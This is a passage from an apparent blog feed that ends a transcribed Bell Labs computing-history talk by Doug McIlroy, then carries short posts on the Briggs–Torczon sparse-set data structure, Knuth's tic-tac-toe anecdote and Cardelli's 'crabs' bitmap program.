href="http://csounds.com/mathews/index.html">Max Mathews</a>, who was the the director of the department has long been interested in computer music. In fact since retirement he spent a lot of time with Pierre Boulez in Paris at a wonderful institute with lots of money simply for making synthetic music. He had a language called Music 5. Synthetic speech or, well first of all simply speech processing was pioneered particularly by <a href="http://en.wikipedia.org/wiki/John_Larry_Kelly,_Jr">John Kelly</a>. I remember my first contact with speech processing. It was customary for computer operators, for the benefit of computer operators, to put a loudspeaker on the low bit of some register on the machine, and normally the operator would just hear kind of white noise. But if you got into a loop, suddenly the machine would scream, and this signal could be used to the operator "oh the machines in a loop. Go stop it and go on to the next job." I remember feeding them an Ackermann’s function routine once. [laughter] They were right. It was a silly loop. But anyway. One day, the operators were ?...?. The machine started singing. Out of the blue. &ldquo;Help! I’m caught in a loop.&rdquo;. [laughter] And in a broad Texas accent, which was the recorded voice of John Kelly.</p> <p class=pp><span style="font-size: 0.7em;">43:14</span> However. From there Kelly went on to do some speech synthesis. Of course there’s been a lot more speech synthesis work done since, by <span style="font-size: 0.7em;">43:31</span> folks like Cecil Coker, Joe Olive. But they produced a record, which unfortunately I can’t play because records are not modern anymore. And everybody got one in the Bell Labs Record, which is a magazine, contained once a record from the acoustics department, with both speech and music and one very famous combination where the computer played and sang "A Bicycle Built For Two".</p> <p class=pp>?...?</p> <p class=pp><span style="font-size: 0.7em;">44:32</span> At the same time as all this stuff is going on here, needless to say computing is going on in the rest of the Labs. it was about early 1960 when the math department lost its monopoly on computing machines and other people started buying them too, but for switching. The first experiments with switching computers were operational in around 1960. They were planned for several years prior to that; essentially as soon as the transistor was invented, the making of electronic rather than electromechanical switching machines was anticipated. Part of the saga of the switching machines is cheap memory. These machines had enormous memories -- thousands of words. [laughter] And it was said that the present worth of each word of memory that programmers saved across the Bell System was something like eleven dollars, as I recall. And it was worthwhile to struggle to save some memory. Also, programs were permanent. You were going to load up the switching machine with switching program and that was going to run. You didn’t change it every minute or two. And it would be cheaper to put it in read only memory than in core memory. And there was a whole series of wild read-only memories, both tried and built. The first experimental Essex System had a thing called the flying spot store which was large photographic plates with bits on them and CRTs projecting on the plates and you would detect underneath on the photodetector whether the bit was set or not. That was the program store of Essex. The program store of the first ESS systems consisted of twistors, which I actually am not sure I understand to this day, but they consist of iron wire with a copper wire wrapped around them and vice versa. There were also experiments with an IC type memory called the waffle iron. Then there was a period when magnetic bubbles were all the rage. As far as I know, although microelectronics made a lot of memory, most of the memory work at Bell Labs has not had much effect on ?...?. Nice tries though.</p> <p class=pp><span style="font-size: 0.7em;">48:28</span> Another thing that folks began to work on was the application of (and of course, right from the start) computers to data processing. When you owned equipment scattered through every street in the country, and you have a hundred million customers, and you have bills for a hundred million transactions a day, there’s really some big data processing going on. And indeed in the early 60s, AT&T was thinking of making its own data processing computers solely for billing. Somehow they pulled out of that, and gave all the technology to IBM, and one piece of that technology went into use in high end equipment called tractor tapes. Inch wide magnetic tapes that would be used for a while.</p> <p class=pp><span style="font-size: 0.7em;">49:50</span> By in large, although Bell Labs has participated until fairly recently in data processing in quite a big way, AT&T never really quite trusted the Labs to do it right because here is where the money is. I can recall one occasion when during strike of temporary employees, a fill-in employee like from the Laboratories and so on, lost a day’s billing tape in Chicago. And that was a million dollars. And that’s generally speaking the money people did not until fairly recently trust Bell Labs to take good care of money, even though they trusted the Labs very well to make extremely reliable computing equipment for switches. The downtime on switches is still spectacular by any industry standards. The design for the first ones was two hours down in 40 years, and the design was met. Great emphasis on reliability and redundancy, testing.</p> <p class=pp><span style="font-size: 0.7em;">51:35</span> Another branch of computing was for the government. The whole Whippany Laboratories [time check] Whippany, where we took on contracts for the government particularly in the computing era in anti-missile defense, missile defense, and underwater sound. Missile defense was a very impressive undertaking. It was about in the early ’63 time frame when it was estimated the amount of computation to do a reasonable job of tracking incoming missiles would be 30 M floating point operations a second. In the day of the Cray that doesn’t sound like a great lot, but it’s more than your high end PCs can do. And the machines were supposed to be reliable. They designed the machines at Whippany, a twelve-processor multiprocessor, to no specs, enormously rugged, one watt transistors. This thing in real life performed remarkably well. There were sixty-five missile shots, tests across the Pacific Ocean ?...? and Lorinda Cherry here actually sat there waiting for them to come in. [laughter] And only a half dozen of them really failed. As a measure of the interest in reliability, one of them failed apparently due to processor error. Two people were assigned to look at the dumps, enormous amounts of telemetry and logging information were taken during these tests, which are truly expensive to run. Two people were assigned to look at the dumps. A year later they had not found the trouble. The team was beefed up. They finally decided that there was a race condition in one circuit. They then realized that this particular kind of race condition had not been tested for in all the simulations. They went back and simulated the entire hardware system to see if its a remote possibility of any similar cases, found twelve of them, and changed the hardware. But to spend over a year looking for a bug is a sign of what reliability meant.</p> <p class=pp><span style="font-size: 0.7em;">54:56</span> Since I’m coming up on the end of an hour, one could go on and on and on,</p> <p class=pp>Crowd: go on, go on. [laughter]</p> <p class=pp><span style="font-size: 0.7em;">55:10</span> Doug: I think I’d like to end up by mentioning a few of the programs that have been written at Bell Labs that I think are most surprising. Of course there are lots of grand programs that have been written.</p> <p class=pp>I already mentioned the block diagram compiler.</p> <p class=pp>Another really remarkable piece of work was <a href="eqn.pdf">eqn</a>, the equation typesetting language, which has been imitated since, by Lorinda Cherry and Brian Kernighan. The notion of taking an auditory syntax, the way people talk about equations, but only talk, this was not borrowed from any written notation before, getting the auditory one down on paper, that was very successful and surprising.</p> <p class=pp>Another of my favorites, and again Lorinda Cherry was in this one, with Bob Morris, was typo. This was a program for finding spelling errors. It didn’t know the first thing about spelling. It would read a document, measure its statistics, and print out the words of the document in increasing order of what it thought the likelihood of that word having come from the same statistical source as the document. The words that did not come from the statistical source of the document were likely to be typos, and now I mean typos as distinct from spelling errors, where you actually hit the wrong key. Those tend to be off the wall, whereas phonetic spelling errors you’ll never find. And this worked remarkably well. Typing errors would come right up to the top of the list. A really really neat program.</p> <p class=pp><span style="font-size: 0.7em;">57:50</span> Another one of my favorites was by Brenda Baker called <a href="http://doi.acm.org/10.1145/800168.811545">struct</a>, which took Fortran programs and converted them into a structured programming language called Ratfor, which was Fortran with C syntax. This seemed like a possible undertaking, like something you do by the seat of the pants and you get something out. In fact, folks at Lockheed had done things like that before. But Brenda managed to find theorems that said there’s really only one form, there’s a canonical form into which you can structure a Fortran program, and she did this. It took your Fortran program, completely mashed it, put it out perhaps in almost certainly a different order than it was in Fortran connected by GOTOs, without any GOTOs, and the really remarkable thing was that authors of the program who clearly knew the way they wrote it in the first place, preferred it after it had been rearranged by Brendan. I was astonished at the outcome of that project.</p> <p class=pp><span style="font-size: 0.7em;">59:19</span> Another first that happened around here was by Fred Grampp, who got interested in computer security. One day he decided he would make a program for sniffing the security arrangements on a computer, as a service: Fred would never do anything crooked. [laughter] This particular program did a remarkable job, and founded a whole minor industry within the company. A department was set up to take this idea and parlay it, and indeed ever since there has been some improvement in the way computer centers are managed, at least until we got Berkeley Unix.</p> <p class=pp><span style="font-size: 0.7em;">60:24</span> And the last interesting program that I have time to mention is one by <a href="http://www.cs.jhu.edu/~kchurch/">Ken Church</a>. He was dealing with -- text processing has always been a continuing ?...? of the research, and in some sense it has an application to our business because we’re handling speech, but he got into consulting with the department in North Carolina that has to translate manuals. There are millions of pages of manuals in the Bell System and its successors, and ever since we’ve gone global, these things had to get translated into many languages.</p> <p class=pp><span style="font-size: 0.7em;">61:28</span> To help in this, he was making tools which would put up on the screen, graphed on the screen quickly a piece of text and its translation, because a translator, particularly a technical translator, wants to know, the last time we mentioned this word how was it translated. You don’t want to be creative in translating technical text. You’d like to be able to go back into the archives and pull up examples of translated text. And the neat thing here is the idea for how do you align texts in two languages. You’ve got the original, you’ve got the translated one, how do you bring up on the screen, the two sentences that go together? And the following scam worked beautifully. This is on western languages. <span style="font-size: 0.7em;">62:33</span> Simply look for common four letter tetragrams, four letter combinations between the two and as best as you can, line them up as nearly linearly with the lengths of the two types as possible. And this <a href="church-tetragram.pdf">very simple idea</a> works like storm. Something for nothing. I like that.</p> <p class=pp><span style="font-size: 0.7em;">63:10</span> The last thing is one slogan that sort of got started with Unix and is just rife within the industry now. Software tools. We were making software tools in Unix before we knew we were, just like the Molière character was amazed at discovering he’d been speaking prose all his life. [laughter] But then <a href="http://www.amazon.com/-/dp/020103669X">Kernighan and Plauger</a> came along and christened what was going on, making simple generally useful and compositional programs to do one thing and do it well and to fit together. They called it software tools, made a book, wrote a book, and this notion now is abroad in the industry. And it really did begin all up in the little attic room where you [points?] sat for many years writing up here.</p> <p class=pp> Oh I forgot to. I haven’t used any slides. I’ve brought some, but I don’t like looking at bullets and you wouldn’t either, and I forgot to show you the one exhibit I brought, which I borrowed from Bob Kurshan. When Bell Labs was founded, it had of course some calculating machines, and it had one wonderful computer. This. That was bought in 1918. There’s almost no other computing equipment from any time prior to ten years ago that still exists in Bell Labs. This is an <a href="http://infolab.stanford.edu/pub/voy/museum/pictures/display/2-5-Mechanical.html">integraph</a>. It has two styluses. You trace a curve on a piece of paper with one stylus and the other stylus draws the indefinite integral here. There was somebody in the math department who gave this service to the whole company, with about 24 hours turnaround time, calculating integrals. Our recent vice president Arno Penzias actually did, he calculated integrals differently, with a different background. He had a chemical balance, and he cut the curves out of the paper and weighed them. This was bought in 1918, so it’s eighty years old. It used to be shiny metal, it’s a little bit rusty now. But it still works.</p> <p class=pp><span style="font-size: 0.7em;">66:30</span> Well, that’s a once over lightly of a whole lot of things that have gone on at Bell Labs. It’s just such a fun place that one I said I just could go on and on. If you’re interested, there actually is a history written. This is only one of about six volumes, <a href="http://www.amazon.com/gp/product/0932764061">this</a> is the one that has the mathematical computer sciences, the kind of things that I’ve mostly talked about here. A few people have copies of them. For some reason, the AT&T publishing house thinks that because they’re history they’re obsolete, and they stopped printing them. [laughter]</p> <p class=pp>Thank you, and that’s all.</p></p> Using Uninitialized Memory for Fun and Profit tag:research.swtch.com,2012:research.swtch.com/sparse 2008-03-14T00:00:00-04:00 2008-03-14T00:00:00-04:00 An unusual but very useful data structure <p><p class=lp> This is the story of a clever trick that's been around for at least 35 years, in which array values can be left uninitialized and then read during normal operations, yet the code behaves correctly no matter what garbage is sitting in the array. Like the best programming tricks, this one is the right tool for the job in certain situations. The sleaziness of uninitialized data access is offset by performance improvements: some important operations change from linear to constant time. </p> <p class=pp> Alfred Aho, John Hopcroft, and Jeffrey Ullman's 1974 book <i>The Design and Analysis of Computer Algorithms</i> hints at the trick in an exercise (Chapter 2, exercise 2.12): </p> <blockquote> Develop a technique to initialize an entry of a matrix to zero the first time it is accessed, thereby eliminating the <i>O</i>(||<i>V</i>||<sup>2</sup>) time to initialize an adjacency matrix. </blockquote> <p class=lp> Jon Bentley's 1986 book <a href="http://www.cs.bell-labs.com/cm/cs/pearls/"><i>Programming Pearls</i></a> expands on the exercise (Column 1, exercise 8; <a href="http://www.cs.bell-labs.com/cm/cs/pearls/sec016.html">exercise 9</a> in the Second Edition): </p> <blockquote> One problem with trading more space for less time is that initializing the space can itself take a great deal of time. Show how to circumvent this problem by designing a technique to initialize an entry of a vector to zero the first time it is accessed. Your scheme should use constant time for initialization and each vector access; you may use extra space proportional to the size of the vector. Because this method reduces initialization time by using even more space, it should be considered only when space is cheap, time is dear, and the vector is sparse. </blockquote> <p class=lp> Aho, Hopcroft, and Ullman's exercise talks about a matrix and Bentley's exercise talks about a vector, but for now let's consider just a simple set of integers. </p> <p class=pp> One popular representation of a set of <i>n</i> integers ranging from 0 to <i>m</i> is a bit vector, with 1 bits at the positions corresponding to the integers in the set. Adding a new integer to the set, removing an integer from the set, and checking whether a particular integer is in the set are all very fast constant-time operations (just a few bit operations each). Unfortunately, two important operations are slow: iterating over all the elements in the set takes time <i>O</i>(<i>m</i>), as does clearing the set. If the common case is that <i>m</i> is much larger than <i>n</i> (that is, the set is only sparsely populated) and iterating or clearing the set happens frequently, then it could be better to use a representation that makes those operations more efficient. That's where the trick comes in. </p> <p class=pp> Preston Briggs and Linda Torczon's 1993 paper, &ldquo;<a href="http://citeseer.ist.psu.edu/briggs93efficient.html"><b>An Efficient Representation for Sparse Sets</b></a>,&rdquo; describes the trick in detail. Their solution represents the sparse set using an integer array named <code>dense</code> and an integer <code>n</code> that counts the number of elements in <code>dense</code>. The <i>dense</i> array is simply a packed list of the elements in the set, stored in order of insertion. If the set contains the elements 5, 1, and 4, then <code>n = 3</code> and <code>dense[0] = 5</code>, <code>dense[1] = 1</code>, <code>dense[2] = 4</code>: </p> <center> <img src="http://research.swtch.com/sparse0.png" /> </center> <p class=pp> Together <code>n</code> and <code>dense</code> are enough information to reconstruct the set, but this representation is not very fast. To make it fast, Briggs and Torczon add a second array named <code>sparse</code> which maps integers to their indices in <code>dense</code>. Continuing the example, <code>sparse[5] = 0</code>, <code>sparse[1] = 1</code>, <code>sparse[4] = 2</code>. Essentially, the set is a pair of arrays that point at each other: </p> <center> <img src="http://research.swtch.com/sparse0b.png" /> </center> <p class=pp> Adding a member to the set requires updating both of these arrays: </p> <pre class=indent> add-member(i): &nbsp;&nbsp;&nbsp;&nbsp;dense[n] = i &nbsp;&nbsp;&nbsp;&nbsp;sparse[i] = n &nbsp;&nbsp;&nbsp;&nbsp;n++ </pre> <p class=lp> It's not as efficient as flipping a bit in a bit vector, but it's still very fast and constant time. </p> <p class=pp> To check whether <code>i</code> is in the set, you verify that the two arrays point at each other for that element: </p> <pre class=indent> is-member(i): &nbsp;&nbsp;&nbsp;&nbsp;return sparse[i] &lt; n && dense[sparse[i]] == i </pre> <p class=lp> If <code>i</code> is not in the set, then <i>it doesn't matter what <code>sparse[i]</code> is set to</i>: either <code>sparse[i]</code> will be bigger than <code>n</code> or it will point at a value in <code>dense</code> that doesn't point back at it. Either way, we're not fooled. For example, suppose <code>sparse</code> actually looks like: </p> <center> <img src="http://research.swtch.com/sparse1.png" /> </center> <p class=lp> <code>Is-member</code> knows to ignore members of sparse that point past <code>n</code> or that point at cells in <code>dense</code> that don't point back, ignoring the grayed out entries: <center> <img src="http://research.swtch.com/sparse2.png" /> </center> <p class=pp> Notice what just happened: <code>sparse</code> can have <i>any arbitrary values</i> in the positions for integers not in the set, those values actually get used during membership tests, and yet the membership test behaves correctly! (This would drive <a href="http://valgrind.org/">valgrind</a> nuts.) </p> <p class=pp> Clearing the set can be done in constant time: </p> <pre class=indent> clear-set(): &nbsp;&nbsp;&nbsp;&nbsp;n = 0 </pre> <p class=lp> Zeroing <code>n</code> effectively clears <code>dense</code> (the code only ever accesses entries in dense with indices less than <code>n</code>), and <code>sparse</code> can be uninitialized, so there's no need to clear out the old values. </p> <p class=pp> This sparse set representation has one more trick up its sleeve: the <code>dense</code> array allows an efficient implementation of set iteration. </p> <pre class=indent> iterate(): &nbsp;&nbsp;&nbsp;&nbsp;for(i=0; i&lt;n; i++) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;yield dense[i] </pre> <p class=pp> Let's compare the run times of a bit vector implementation against the sparse set: </p> <center> <table> <tr> <td><i>Operation</i> <td align=center width=10> <td align=center><i>Bit Vector</i> <td align=center width=10> <td align=center><i>Sparse set</i> </tr> <tr> <td>is-member <td> <td align=center><i>O</i>(1) <td> <td align=center><i>O</i>(1) </tr> <tr> <td>add-member <td> <td align=center><i>O</i>(1) <td> <td align=center><i>O</i>(1) </tr> <tr> <td>clear-set <td><td align=center><i>O</i>(<i>m</i>) <td><td align=center><i>O</i>(1) </tr> <tr> <td>iterate <td><td align=center><i>O</i>(<i>m</i>) <td><td align=center><i>O</i>(<i>n</i>) </tr> </table> </center> <p class=lp> The sparse set is as fast or faster than bit vectors for every operation. The only problem is the space cost: two words replace each bit. Still, there are times when the speed differences are enough to balance the added memory cost. Briggs and Torczon point out that liveness sets used during register allocation inside a compiler are usually small and are cleared very frequently, making sparse sets the representation of choice. </p> <p class=pp> Another situation where sparse sets are the better choice is work queue-based graph traversal algorithms. Iteration over sparse sets visits elements in the order they were inserted (above, 5, 1, 4), so that new entries inserted during the iteration will be visited later in the same iteration. In contrast, iteration over bit vectors visits elements in integer order (1, 4, 5), so that new elements inserted during traversal might be missed, requiring repeated iterations. </p> <p class=pp> Returning to the original exercises, it is trivial to change the set into a vector (or matrix) by making <code>dense</code> an array of index-value pairs instead of just indices. Alternately, one might add the value to the <code>sparse</code> array or to a new array. The relative space overhead isn't as bad if you would have been storing values anyway. </p> <p class=pp> Briggs and Torczon's paper implements additional set operations and examines performance speedups from using sparse sets inside a real compiler. </p></p> Play Tic-Tac-Toe with Knuth tag:research.swtch.com,2012:research.swtch.com/tictactoe 2008-01-25T00:00:00-05:00 2008-01-25T00:00:00-05:00 The only winning move is not to play. <p><p class=lp>Section 7.1.2 of the <b><a href="http://www-cs-faculty.stanford.edu/~knuth/taocp.html#vol4">Volume 4 pre-fascicle 0A</a></b> of Donald Knuth's <i>The Art of Computer Programming</i> is titled &#8220;Boolean Evaluation.&#8221; In it, Knuth considers the construction of a set of nine boolean functions telling the correct next move in an optimal game of tic-tac-toe. In a footnote, Knuth tells this story:</p> <blockquote><p class=lp>This setup is based on an exhibit from the early 1950s at the Museum of Science and Industry in Chicago, where the author was first introduced to the magic of switching circuits. The machine in Chicago, designed by researchers at Bell Telephone Laboratories, allowed me to go first; yet I soon discovered there was no way to defeat it. Therefore I decided to move as stupidly as possible, hoping that the designers had not anticipated such bizarre behavior. In fact I allowed the machine to reach a position where it had two winning moves; and it seized <i>both</i> of them! Moving twice is of course a flagrant violation of the rules, so I had won a moral victory even though the machine had announced that I had lost.</p></blockquote> <p class=lp> That story alone is fairly amusing. But turning the page, the reader finds a quotation from Charles Babbage's <i><a href="http://onlinebooks.library.upenn.edu/webbin/book/lookupid?key=olbp36384">Passages from the Life of a Philosopher</a></i>, published in 1864:</p> <blockquote><p class=lp>I commenced an examination of a game called &#8220;tit-tat-to&#8221; ... to ascertain what number of combinations were required for all the possible variety of moves and situations. I found this to be comparatively insignificant. ... A difficulty, however, arose of a novel kind. When the automaton had to move, it might occur that there were two different moves, each equally conducive to his winning the game. ... Unless, also, some provision were made, the machine would attempt two contradictory motions.</p></blockquote> <p class=lp> The only real winning move is not to play.</p></p> Crabs, the bitmap terror! tag:research.swtch.com,2012:research.swtch.com/crabs 2008-01-09T00:00:00-05:00 2008-01-09T00:00:00-05:00 A destructive, pointless violation of the rules <p><p class=lp>Today, window systems seem as inevitable as hierarchical file systems, a fundamental building block of computer systems. But it wasn't always that way. This paper could only have been written in the beginning, when everything about user interfaces was up for grabs.</p> <blockquote><p class=lp>A bitmap screen is a graphic universe where windows, cursors and icons live in harmony, cooperating with each other to achieve functionality and esthetics. A lot of effort goes into making this universe consistent, the basic law being that every window is a self contained, protected world. In particular, (1) a window shall not be affected by the internal activities of another window. (2) A window shall not be affected by activities of the window system not concerning it directly, i.e. (2.1) it shall not notice being obscured (partially or totally) by other windows or obscuring (partially or totally) other windows, (2.2) it shall not see the <i>image</i> of the cursor sliding on its surface (it can only ask for its position).</p> <p class=pp> Of course it is difficult to resist the temptation to break these rules. Violations can be destructive or non-destructive, useful or pointless. Useful non-destructive violations include programs printing out an image of the screen, or magnifying part of the screen in a <i>lens</i> window. Useful destructive violations are represented by the <i>pen</i> program, which allows one to scribble on the screen. Pointless non-destructive violations include a magnet program, where a moving picture of a magnet attracts the cursor, so that one has to continuously pull away from it to keep working. The first pointless, destructive program we wrote was <i>crabs</i>.</p> </blockquote> <p class=lp>As the crabs walk over the screen, they leave gray behind, &#8220;erasing&#8221; the apps underfoot:</p> <blockquote><img src="http://research.swtch.com/crabs1.png"> </blockquote> <p class=lp> For the rest of the story, see Luca Cardelli's &#8220;<a style="font-weight: bold;" href="http://lucacardelli.name/Papers/Crabs.pdf">Crabs: the bitmap terror!</a>&#8221; (6.7MB). Additional details in &#8220;<a href="http://lucacardelli.name/Papers/Crabs%20%28History%20and%20Screen%20Dumps%29.pdf">Crabs (History and Screen Dumps)</a>&#8221; (57.1MB).</p></p>